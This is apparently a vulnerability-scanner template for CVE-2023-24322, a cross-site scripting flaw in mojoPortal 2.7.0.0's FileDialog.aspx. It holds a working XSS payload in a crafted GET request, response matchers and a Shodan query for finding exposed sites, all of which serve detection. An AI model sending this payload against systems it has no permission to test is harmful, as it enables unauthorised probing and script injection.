id: CVE-2023-24322 info: name: mojoPortal 2.7.0.0 - Cross-Site Scripting author: pikpikcu severity: medium description: | mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters. reference: - https://github.com/blakduk/Advisories/blob/main/Mojoportal/README.md - https://github.com/i7MEDIA/mojoportal/ - https://www.mojoportal.com/ - https://nvd.nist.gov/vuln/detail/CVE-2023-24322 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-79 cve-id: CVE-2023-24322 metadata: shodan-query: html:"mojoPortal" verified: "true" tags: cves,cve2023,mojoportal,xss requests: - method: GET path: - "{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g" matchers-condition: and matchers: - type: word part: body words: - "javascript:alert('document.domain')" - "File Browser" condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # Enhanced by md on 2023/03/07